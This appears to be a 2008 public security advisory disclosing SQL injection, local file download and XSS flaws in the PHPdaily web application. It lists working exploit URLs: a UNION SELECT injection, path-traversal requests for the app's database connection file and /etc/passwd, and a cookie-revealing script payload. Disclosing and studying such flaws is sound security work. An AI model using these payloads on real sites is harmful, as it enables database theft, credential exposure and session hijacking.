___________________________________________________________________________________________________________
| _ __ ___ ___ __________________ ___ ___ ____ ______ __ ___ _________________ _______ |
| | | / / / / / //_______ _______/ / / / // || ____|| |/ // ___________// \ |
| | | ^ / / / /_/ / /__/ / /___ ___ / /_/ // || | | v // /___ / O / |
| | | / \ / / / _ / / / / ____/ /__// __ // /| || | | \\ ____/ / / |
| | |/ \/ / / / / / / / / /_______ / / / // /_| || |___ | |\ \\ /__________ / /\ \ |
| | / /\ / /__/ /__/ /__/ /__________/ /__/ /__//________||______||__| \__\\___________//____/ \___\ |
| | / \/ |
| | / _____________________________________________________________________________________________________|
| | / / .: PHPdaily Multiple Remote Vulnerabilities (SQL-INJ,XSS,Local File Download Vulnerability):. |
| |/ /______________________________________________________________________________________________________|
| v / Discoverd By: 0xFFFFFF . Main THX: ALLAH |
| / Home: www.white-hacker.com . Greetz To: All Hackers & WHITE-HACKER Team |
| / Mail: admin(at)white-hacker[dot]com . |
|/ Country: Algeria . |
v___________________________________________________________________________________________________________|
| Publication info :. |
|___________________________________________________________________________________________________________|
| Date: 23-10-2008 . Method : [*] GET [ ] POST |
| Content: Vulnerability . Register Globals : [ ] ON [*] OFF |
| Type: SQL-INJ,XSS,LFD . Magic quotes : [*] ON [ ] OFF |
| Application: PHPdaily . Risk: [*] High [ ] medium [ ] Low |
| Venedor site: http://phpdaily.self-reliance.be/ . |
| Version: N/A . |
| -------------------------------------------------- . |
| Impact: Exploring Database . |
| Run unauthorized JavaScript . |
| Local File Download . |
| -------------------------------------------------- . |
| Exploit: Available . |
| Fix: N/A . |
|___________________________________________________________________________________________________________|
| Description :. |
|___________________________________________________________________________________________________________|
| |
| After a quick audit, I have noticed that PHPdaily is a very weak script which contains many types of |
| vulnerabilities. |
| |
| Inputs "id,prev" passed into add_postit.php,delete.php,prest_detail.php,mod_prest_date.php pages are not |
| properly verified, a simple user can easily get sensitive information from the database by injecting |
| SQL Queries. |
| |
| Also through "download_file.php" page via the input "fichierwe" any user can download any local file. |
| Furthermore, through "add_prest_date.php" page there is the ability of XSS. |
| |
| ......................................................................................................... |
| |
| Requirement |
| You have to connect as a simple user |
| |
| 1. SQL injection Exploit : |
| [Site]add_postit.php?mode=rep&id=-1+union+select+1,2,3,version(),5,6,7,8# |
| [Site]delete.php?prev=accueil&mode=postit&id=[SQL-INJ] (-1+union+select+[17 Columns]) |
| [Site]prest_detail.php?prev=[SQL-INJ] |
| [Site]mod_prest_date.php?prev=list&id=[SQL-INJ] |
| |
| 2. Local File Download Exploit : |
| [Site]download_file.php?fichier=../include/connect.php |
| [Site]download_file.php?fichier=../../../../../../etc/passwd |
| |
| 3. XSS Exploit: |
| [Site]add_prest_date.php?date="><script>alert(document.cookie)</script> |
|___________________________________________________________________________________________________________|
| Notice :. |
|___________________________________________________________________________________________________________|
| These publications are published for educational purpose thus the author will be not responsible |
| for any damage. |
|___________________________________________________________________________________________________________|
\ © WHITE-HACKER All contents © 2008. All rights reserved. |
\____________________________________________________________|
# milw0rm.com [2008-10-24]
